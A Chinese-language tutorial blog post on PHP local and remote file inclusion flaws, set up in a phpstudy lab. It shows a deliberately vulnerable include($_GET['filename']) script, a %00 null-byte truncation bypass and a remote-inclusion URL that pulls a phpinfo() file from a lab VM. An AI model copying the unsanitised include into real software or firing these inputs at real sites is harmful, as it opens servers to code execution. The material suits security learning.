文件包含漏洞的小点总结

文件本地与远程包含:

文件包含有本地包含与远程包含的区别:本地包含只能包含服务器已经有的问题;

远程包含可以包含一切网络上的文件。

  • 本地包含:

①无限制

感受一下使用phpstudy的文件上传,开启phpstudy的apache服务,在网站根目录新建两个文件

php 复制代码
//1.txt 
<?php 
phpinfo(); 
?> 

//upload.php 
<?php 
$filename=$_GET['filename']; 
include($filename); 
?>

直接访问localhost/upload.php?filename=1.txt(upload.php文件内容意为使用GET方式将文件名参数传入,执行包含指令),访问如图(即使是txt文件,但是include会将其按php文件进行解析)

②有限制

如果服务器对上传的文件有限制,我们需要做绕过处理将文件包含进去。

在网站根目录下新建两个文件

php 复制代码
//1.txt 
<?php 
phpinfo(); 
?>
 
//upload2.php 
<?php 
$filename=$_GET['filename']; 
include($filename.'.html') 
?>

如果直接访问localhost/upload2.php?filename=1.txt会报错,因为有限制,我们可以使用%00截断进行绕过。(%00具体解释参考往篇)访问localhost/upload2.php?filename=1.txt%00

长度截断:Windows和Linux对命名长度有限制,前者256个字符(磁盘分区还占一个,用户只能使用255个),后者4096

  • 远程包含:

phpstudy其他选项菜单-php扩展与设置-参数开关设置中打开allow_url_include(一般情况下为了安全性,这个是关的状态)

在远程服务器上上传文件(或者可以用虚拟机靶机做实验,在靶机的phpstudy上的根目录里写文件)如下:

php 复制代码
//1.txt 
<?php 
phpinfo(); 
?>

靶机查询IP地址,假如是192.168.123.23

就可以在主机上直接访问http://192.168.123.23:88/1.txt

可以看到上传文件内容。

我们再使用文件包含,即访问http://localhost/upload.php?filename=http://192.168.123.23:88/1.txt即可执行文件内容。![](https://i-blog.csdnimg.cn/direct/d7cd994ef2b347fc837591c509619374.png)

相关推荐
vortex52 小时前
网络安全入门综述
安全·web安全·网络安全
万博智云OneProCloud2 小时前
解锁服务器迁移的未来:《2025 服务器迁移效率白皮书》(附下载)
服务器·hypermotion云迁移·it基础设施
智驱力人工智能3 小时前
夏季道路安全的AI革命:节省人力、提升效率
人工智能·安全·边缘计算·视觉算法·视觉分析·智能巡航·人工智能云计算
白云~️5 小时前
uniappx 打包配置32位64位x86安装包
运维·服务器·github
在河之洲木水6 小时前
现代多核调度器的本质 调度三重奏
linux·服务器·系统架构
神经毒素6 小时前
WEB安全--社会工程--SET钓鱼网站
安全·web安全
白总Server7 小时前
多智能体系统的中间件架构
linux·运维·服务器·中间件·ribbon·架构·github
2401_867021909 小时前
文件缓冲区(IO与文件 ·III)(linux/C)
linux·运维·服务器·c语言
悄悄敲敲敲9 小时前
Linux:进程间通信->命名管道
linux·运维·服务器
望获linux10 小时前
智能清洁机器人中的实时操作系统应用研究
大数据·linux·服务器·人工智能·机器人·操作系统